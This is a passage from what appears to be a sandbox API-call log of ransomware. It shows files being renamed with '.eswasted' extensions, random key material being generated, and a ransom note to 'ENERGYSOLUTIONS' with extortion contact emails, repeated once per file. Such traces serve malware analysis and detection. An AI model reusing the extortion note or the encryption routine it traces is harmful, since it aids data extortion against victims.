phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.786] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.786] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.786] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0071.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b0) returned 0x70b3c8 [0071.786] lstrcpyW (in: lpString1=0x70b46e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71b640 [0071.786] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.786] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71b640 | out: pbBuffer=0x71b640) returned 1 [0071.786] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.787] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.787] WriteFile (in: hFile=0x11c, lpBuffer=0x71b640*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71b640*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.788] SetEndOfFile (hFile=0x11c) returned 1 [0071.788] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.788] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.788] lstrcpyW (in: lpString1=0x70b46e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.eswasted")) returned 1 [0071.789] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0071.789] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.789] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x333 [0071.789] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x330000 [0071.789] CloseHandle (hObject=0x134) returned 1 [0071.792] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.792] CloseHandle (hObject=0x128) returned 1 [0071.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.792] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.793] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.793] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.793] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.794] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.794] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.802] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x71b640 [0071.802] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.802] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71ba50 [0071.802] _snwprintf (in: _Dest=0x71ba50, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]S5D8J2yP5RgF3VtH/70AICH7G5J2nvr5dUhELufVVpMq9JezJUK+fTuFmWr1YTpP\r\n8DNuW4AZRJm3PAiB8vzQ+5RR6ezOJLgBdp7p5e84L2pEJF+bYcWTMTMhGsyCdvXI\r\nyZiZc2iGSN7DJG+cju5o2MGeMp9rlvEcdKJlo8y5X5LiKNxV3fz/O0QVbA52Qi3u\r\nPnIMIjn2eP0YgpK0lJbhOL7qcIldgMqLes3UGvdvrI0cxOt2QydhB4JtvH7G9d2J\r\nvYiwkqxEOYsh8mQX6lh4wcofZdKSHmY8jq5r15H8iR2Ru3m7ScR3nDl7kvrUAV8V\r\nOUC55mY52EJEPZZXxD3NPJBjY2WVfCVl0uPhM4RHDpn7O+08HjM9+E3XxCNHRI/y\r\n9YJtazURAWbGz3uZJMKg1ii643iXmrPHBYof12R7eMahbUiDLUViDBB2AoVFiPmG\r\n8GQP7/vX++OO6z6IdTzDA5lmXiW0/r/a4LI3PtzjmsF6gAnngjkKdOpqcrvri7Ni\r\nxTfQ2tGH0695p4fJHnR7hHeZ7gl3FYYfuDvXwLSSg1I7guRGzr2QJ96SO9QTIAgc\r\nYvHim752GPiM/8BcuoBIb8h09suwSbgLYe2xxKS4Wznyv2WsMoiDvHdYMF+jcVUt\r\nKHt/u5Pkeb5wMDV5uRxzVQPqvfAEqc0OcLunlZ51rHp=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.802] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.803] WriteFile (in: hFile=0x11c, lpBuffer=0x71ba50*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x71ba50*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.803] SetEndOfFile (hFile=0x11c) returned 1 [0071.805] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ba50 | out: hHeap=0x6d0000) returned 1 [0071.805] CloseHandle (hObject=0x11c) returned 1 [0071.806] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.806] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bbe0 | out: hHeap=0x6d0000) returned 1 [0071.806] _aulldvrm () returned 0x0 [0071.806] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.807] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.807] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.807] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0071.807] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a4) returned 0x70b3c8 [0071.807] lstrcpyW (in: lpString1=0x70b462, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.807] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71b640 [0071.807] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.808] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71b640 | out: pbBuffer=0x71b640) returned 1 [0071.808] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.808] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.828] WriteFile (in: hFile=0x130, lpBuffer=0x71b640*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71b640*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.831] SetEndOfFile (hFile=0x130) returned 1 [0071.832] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.832] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.832] lstrcpyW (in: lpString1=0x70b462, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.eswasted")) returned 1 [0071.834] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.834] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0071.834] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x6a3b [0071.834] MapViewOfFile (hFileMappingObject=0x134, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a3b) returned 0x330000 [0071.834] CloseHandle (hObject=0x11c) returned 1 [0071.837] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.837] CloseHandle (hObject=0x134) returned 1 [0071.837] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.837] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.838] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.838] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.838] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.839] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.839] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.847] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71b640 [0071.847] _snwprintf (in: _Dest=0x71b640, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EKekX2Ch+ymPqtcK1QBSmxHm04rTtHudHgEx9wZcp2Q9H6aX0qeILsF5+6pIQEDf\r\n8VowFWOk34WBAO6/QVoFTuUqgKTW7It4/zlbc1ANvV+wmfK7wQYw8QtNdIwl4YTE\r\nz/s6xpv31U2oEVYqSQFyhCfDM7ksS47uwB5qZsSPzka7RU5yubV9ZwvlhByvU4Ts\r\n6PlyEVR/MvK2tKZYgBFQXdSeFH/ZuE3axWa/Btfc5uhHH9yQIYpqESimfmEB7eq1\r\nOuYBQMiK3l7N79JvyYrpj7hfx0cl4da1WCLhJZr7/4i8Yx/o0yu6ZsJMTjDRi+cL\r\nW1Ja8GV3pwHFMR8KeQYP/iLi5b5fAqe+VFtH0BxuVrvregt2jYRASVcoEl9NzXlZ\r\nQ5gZVy5ElcHXw3N/CG8JlX6zqLit/CS0QeDRlYA1JpUfHVkb9jSjfJrpkfN3ErfC\r\nvcA4ZzxzVhHSRoAjdv7kEYnXv9cqgtN0uZDWdwwlyYiOdlKau/ZLbUqbN6JkrtrY\r\nn9/dWKrrLW1JvjCW4ibdKGvklrLWr7EYYqaiQSgJAQbceAeKQnu8f2LDkHymtB1Q\r\nimQR3ukQ2N1nuU2wpNfXaJifCftJY8bgWxE4taX8djZtvtXiir22tIMj1iSg03Ho\r\nJ/looYVK5GQ+oc6H99sdDNTZWuNKGll408t5tMqD4PW=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.847] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7227a0 | out: hHeap=0x6d0000) returned 1 [0071.847] WriteFile (in: hFile=0x130, lpBuffer=0x71b640*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x71b640*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.848] SetEndOfFile (hFile=0x130) returned 1 [0071.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.850] CloseHandle (hObject=0x130) returned 1 [0071.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.851] _aulldvrm () returned 0x0 [0071.851] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.852] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.852] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.852] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0071.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b3c8 [0071.852] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71b640 [0071.852] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.853] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71b640 | out: pbBuffer=0x71b640) returned 1 [0071.853] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.853] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.853] WriteFile (in: hFile=0x130, lpBuffer=0x71b640*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71b640*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.854] SetEndOfFile (hFile=0x130) returned 1 [0071.855] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.855] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.eswasted")) returned 1 [0071.855] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0071.856] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0071.856] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x10676 [0071.856] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10676) returned 0x330000 [0071.856] CloseHandle (hObject=0x134) returned 1 [0071.860] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.861] CloseHandle (hObject=0x11c) returned 1 [0071.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.861] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.862] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.862] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.862] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.862] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.863] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.871] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71b640 [0071.871] _snwprintf (in: _Dest=0x71b640, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]txupaLuTrtfNJyVpKtjs+JeGzQouL5eNdUZVHu4G97V9BndLAovhNqHAvpFRVz6A\r\nfWGxkiTKkLxAlcXzTKUu5KcmuIlpsK2DT6bzrDli+j6mh1YrlT+DZUnm/Q4JlteH\r\n7ogaIt33g4J49Wb1jSaFUlSVTDHLUr9kBFTtJdn5sDfusg5p/XS8is0UfF9ENjpx\r\n5NTUG4TL4mF0t3Rig78HtYB1avQuQW/T1pV7esvMhJF8biode6Yj3aRm0rFWb5gf\r\nq5KuLWsMQNWjx0p+A1euQioH23RKX0fh2J6DrZU7fBZhzbCFw+7ONWp0daGHbXHe\r\nqG5E7HDW04pmk8iB8PjSWdLG2zfkJ9+GpYcZubXspgzMXCzeng93cooHAsdCguQh\r\nyxEXMIRDj8e4BlUV3wWSfx9X0spnCxyZYR5fxCmWIexrRNYlWZUgcGsw0n3C6f1J\r\nN51EgWm40ZAyoBjv7pfccelYj9UQUpO/hZwPqadl3qQRInCWyqXii7DAHFziX7vO\r\n3gA/dPu169dxCwCfXe3ch9XuEKxM25T1Uqx9hL6d0RyJV/dDTewGhf3A90gLJi3x\r\nyfVDyiL4QUEzRLJlAF3j+hRBrrDdN37DyCBWuJxQZ8XpW4CDUGperaMU3mtonO94\r\n/N858gVua+/QOM931zBaM6Zq5cPrbryWcuU/gpZBXst=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7227a0 | out: hHeap=0x6d0000) returned 1 [0071.871] WriteFile (in: hFile=0x130, lpBuffer=0x71b640*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x71b640*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.871] SetEndOfFile (hFile=0x130) returned 1 [0071.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.879] CloseHandle (hObject=0x130) returned 1 [0071.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.881] _aulldvrm () returned 0x0 [0071.881] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.882] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.882] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.882] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b3c8 [0071.882] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71b640 [0071.882] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.883] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71b640 | out: pbBuffer=0x71b640) returned 1 [0071.883] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.883] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.883] WriteFile (in: hFile=0x130, lpBuffer=0x71b640*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71b640*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.884] SetEndOfFile (hFile=0x130) returned 1 [0071.884] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.884] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.884] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All 